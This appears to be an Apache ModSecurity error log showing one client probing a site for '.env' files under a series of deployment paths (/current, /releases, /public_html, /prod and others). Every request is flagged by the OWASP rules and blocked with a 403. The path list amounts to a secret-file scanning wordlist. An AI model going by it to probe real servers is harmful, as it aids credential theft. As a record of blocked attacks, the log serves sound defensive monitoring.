[Mon May 11 17:36:01.416981 2026] [security2:error] [pid 1411201:tid 1411247] [client 18.144.25.17:59174] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "nearoo.fr"] [uri "/var/www/html/.env"] [unique_id "agH3Yfy_GXSWIKeli0sNdwAAAIE"]
[Mon May 11 17:36:01.564742 2026] [ssl:error] [pid 1416109:tid 1416133] (EAI 2)Name or service not known: [client 167.172.124.149:43422] AH01972: could not resolve address of OCSP responder r3.o.lencr.org
[Mon May 11 17:36:01.564796 2026] [ssl:error] [pid 1416109:tid 1416133] AH01941: stapling_renew_response: responder error
[Mon May 11 17:36:01.694701 2026] [security2:error] [pid 1411201:tid 1411247] [client 18.144.25.17:59174] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /current/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "nearoo.fr"] [uri "/current/.env"] [unique_id "agH3Yfy_GXSWIKeli0sNeAAAAIE"]
[Mon May 11 17:36:01.694958 2026] [security2:error] [pid 1411201:tid 1411247] [client 18.144.25.17:59174] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "nearoo.fr"] [uri "/current/.env"] [unique_id "agH3Yfy_GXSWIKeli0sNeAAAAIE"]
[Mon May 11 17:36:01.695235 2026] [security2:error] [pid 1411201:tid 1411247] [client 18.144.25.17:59174] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "nearoo.fr"] [uri "/current/.env"] [unique_id "agH3Yfy_GXSWIKeli0sNeAAAAIE"]
[Mon May 11 17:36:01.922485 2026] [security2:error] [pid 1411201:tid 1411247] [client 18.144.25.17:59174] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /release/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "nearoo.fr"] [uri "/release/.env"] [unique_id "agH3Yfy_GXSWIKeli0sNegAAAIE"]
[Mon May 11 17:36:01.922667 2026] [security2:error] [pid 1411201:tid 1411247] [client 18.144.25.17:59174] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "nearoo.fr"] [uri "/release/.env"] [unique_id "agH3Yfy_GXSWIKeli0sNegAAAIE"]
[Mon May 11 17:36:01.922879 2026] [security2:error] [pid 1411201:tid 1411247] [client 18.144.25.17:59174] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "nearoo.fr"] [uri "/release/.env"] [unique_id "agH3Yfy_GXSWIKeli0sNegAAAIE"]
[Mon May 11 17:36:02.144607 2026] [security2:error] [pid 1411201:tid 1411247] [client 18.144.25.17:59174] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /releases/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "nearoo.fr"] [uri "/releases/.env"] [unique_id "agH3Yvy_GXSWIKeli0sNewAAAIE"]
[Mon May 11 17:36:02.144848 2026] [security2:error] [pid 1411201:tid 1411247] [client 18.144.25.17:59174] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "nearoo.fr"] [uri "/releases/.env"] [unique_id "agH3Yvy_GXSWIKeli0sNewAAAIE"]
[Mon May 11 17:36:02.145079 2026] [security2:error] [pid 1411201:tid 1411247] [client 18.144.25.17:59174] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "nearoo.fr"] [uri "/releases/.env"] [unique_id "agH3Yvy_GXSWIKeli0sNewAAAIE"]
[Mon May 11 17:36:02.334328 2026] [security2:error] [pid 1411201:tid 1411247] [client 18.144.25.17:59174] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /shared/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "nearoo.fr"] [uri "/shared/.env"] [unique_id "agH3Yvy_GXSWIKeli0sNfAAAAIE"]
[Mon May 11 17:36:02.334573 2026] [security2:error] [pid 1411201:tid 1411247] [client 18.144.25.17:59174] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "nearoo.fr"] [uri "/shared/.env"] [unique_id "agH3Yvy_GXSWIKeli0sNfAAAAIE"]
[Mon May 11 17:36:02.334826 2026] [security2:error] [pid 1411201:tid 1411247] [client 18.144.25.17:59174] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "nearoo.fr"] [uri "/shared/.env"] [unique_id "agH3Yvy_GXSWIKeli0sNfAAAAIE"]
[Mon May 11 17:36:02.573966 2026] [security2:error] [pid 1411201:tid 1411247] [client 18.144.25.17:59174] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /deploy/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "nearoo.fr"] [uri "/deploy/.env"] [unique_id "agH3Yvy_GXSWIKeli0sNfQAAAIE"]
[Mon May 11 17:36:02.574221 2026] [security2:error] [pid 1411201:tid 1411247] [client 18.144.25.17:59174] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "nearoo.fr"] [uri "/deploy/.env"] [unique_id "agH3Yvy_GXSWIKeli0sNfQAAAIE"]
[Mon May 11 17:36:02.574472 2026] [security2:error] [pid 1411201:tid 1411247] [client 18.144.25.17:59174] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "nearoo.fr"] [uri "/deploy/.env"] [unique_id "agH3Yvy_GXSWIKeli0sNfQAAAIE"]
[Mon May 11 17:36:02.757867 2026] [security2:error] [pid 1411201:tid 1411247] [client 18.144.25.17:59174] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /build/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "nearoo.fr"] [uri "/build/.env"] [unique_id "agH3Yvy_GXSWIKeli0sNfwAAAIE"]
[Mon May 11 17:36:02.758100 2026] [security2:error] [pid 1411201:tid 1411247] [client 18.144.25.17:59174] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "nearoo.fr"] [uri "/build/.env"] [unique_id "agH3Yvy_GXSWIKeli0sNfwAAAIE"]
[Mon May 11 17:36:02.758355 2026] [security2:error] [pid 1411201:tid 1411247] [client 18.144.25.17:59174] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "nearoo.fr"] [uri "/build/.env"] [unique_id "agH3Yvy_GXSWIKeli0sNfwAAAIE"]
[Mon May 11 17:36:02.972713 2026] [security2:error] [pid 1411201:tid 1411247] [client 18.144.25.17:59174] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /dist/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "nearoo.fr"] [uri "/dist/.env"] [unique_id "agH3Yvy_GXSWIKeli0sNgAAAAIE"]
[Mon May 11 17:36:02.972946 2026] [security2:error] [pid 1411201:tid 1411247] [client 18.144.25.17:59174] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "nearoo.fr"] [uri "/dist/.env"] [unique_id "agH3Yvy_GXSWIKeli0sNgAAAAIE"]
[Mon May 11 17:36:02.973212 2026] [security2:error] [pid 1411201:tid 1411247] [client 18.144.25.17:59174] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "nearoo.fr"] [uri "/dist/.env"] [unique_id "agH3Yvy_GXSWIKeli0sNgAAAAIE"]
[Mon May 11 17:36:03.158777 2026] [security2:error] [pid 1411201:tid 1411247] [client 18.144.25.17:59174] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /public_html/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "nearoo.fr"] [uri "/public_html/.env"] [unique_id "agH3Y_y_GXSWIKeli0sNgQAAAIE"]
[Mon May 11 17:36:03.159000 2026] [security2:error] [pid 1411201:tid 1411247] [client 18.144.25.17:59174] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "nearoo.fr"] [uri "/public_html/.env"] [unique_id "agH3Y_y_GXSWIKeli0sNgQAAAIE"]
[Mon May 11 17:36:03.159275 2026] [security2:error] [pid 1411201:tid 1411247] [client 18.144.25.17:59174] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "nearoo.fr"] [uri "/public_html/.env"] [unique_id "agH3Y_y_GXSWIKeli0sNgQAAAIE"]
[Mon May 11 17:36:03.408798 2026] [security2:error] [pid 1411201:tid 1411247] [client 18.144.25.17:59174] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /htdocs/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "nearoo.fr"] [uri "/htdocs/.env"] [unique_id "agH3Y_y_GXSWIKeli0sNggAAAIE"]
[Mon May 11 17:36:03.409042 2026] [security2:error] [pid 1411201:tid 1411247] [client 18.144.25.17:59174] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "nearoo.fr"] [uri "/htdocs/.env"] [unique_id "agH3Y_y_GXSWIKeli0sNggAAAIE"]
[Mon May 11 17:36:03.409323 2026] [security2:error] [pid 1411201:tid 1411247] [client 18.144.25.17:59174] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "nearoo.fr"] [uri "/htdocs/.env"] [unique_id "agH3Y_y_GXSWIKeli0sNggAAAIE"]
[Mon May 11 17:36:03.643101 2026] [security2:error] [pid 1411201:tid 1411247] [client 18.144.25.17:59174] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /www/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "nearoo.fr"] [uri "/www/.env"] [unique_id "agH3Y_y_GXSWIKeli0sNgwAAAIE"]
[Mon May 11 17:36:03.643350 2026] [security2:error] [pid 1411201:tid 1411247] [client 18.144.25.17:59174] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "nearoo.fr"] [uri "/www/.env"] [unique_id "agH3Y_y_GXSWIKeli0sNgwAAAIE"]
[Mon May 11 17:36:03.643642 2026] [security2:error] [pid 1411201:tid 1411247] [client 18.144.25.17:59174] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "nearoo.fr"] [uri "/www/.env"] [unique_id "agH3Y_y_GXSWIKeli0sNgwAAAIE"]
[Mon May 11 17:36:03.913638 2026] [security2:error] [pid 1411201:tid 1411247] [client 18.144.25.17:59174] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /html/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "nearoo.fr"] [uri "/html/.env"] [unique_id "agH3Y_y_GXSWIKeli0sNhQAAAIE"]
[Mon May 11 17:36:03.913866 2026] [security2:error] [pid 1411201:tid 1411247] [client 18.144.25.17:59174] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "nearoo.fr"] [uri "/html/.env"] [unique_id "agH3Y_y_GXSWIKeli0sNhQAAAIE"]
[Mon May 11 17:36:03.914107 2026] [security2:error] [pid 1411201:tid 1411247] [client 18.144.25.17:59174] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "nearoo.fr"] [uri "/html/.env"] [unique_id "agH3Y_y_GXSWIKeli0sNhQAAAIE"]
[Mon May 11 17:36:04.112864 2026] [security2:error] [pid 1411201:tid 1411247] [client 18.144.25.17:59174] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /live/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "nearoo.fr"] [uri "/live/.env"] [unique_id "agH3ZPy_GXSWIKeli0sNhgAAAIE"]
[Mon May 11 17:36:04.113093 2026] [security2:error] [pid 1411201:tid 1411247] [client 18.144.25.17:59174] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "nearoo.fr"] [uri "/live/.env"] [unique_id "agH3ZPy_GXSWIKeli0sNhgAAAIE"]
[Mon May 11 17:36:04.113352 2026] [security2:error] [pid 1411201:tid 1411247] [client 18.144.25.17:59174] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "nearoo.fr"] [uri "/live/.env"] [unique_id "agH3ZPy_GXSWIKeli0sNhgAAAIE"]
[Mon May 11 17:36:04.338975 2026] [security2:error] [pid 1411201:tid 1411247] [client 18.144.25.17:59174] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /prod/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "nearoo.fr"] [uri "/prod/.env"] [unique_id "agH3ZPy_GXSWIKeli0sNhwAAAIE"]
[Mon May 11 17:36:04.339288 2026] [security2:error] [pid 1411201:tid 1411247] [client 18.144.25.17:59174] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "nearoo.fr"] [uri "/prod/.env"] [unique_id "agH3ZPy_GXSWIKeli0sNhwAAAIE"]
[Mon May 11 17:36:04.339540 2026] [security2:error] [pid 1411201:tid 1411247] [client 18.144.25.17:59174] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "nearoo.fr"] [uri "/prod/.env"] [unique_id "agH3ZPy_GXSWIKeli0sNhwAAAIE"]
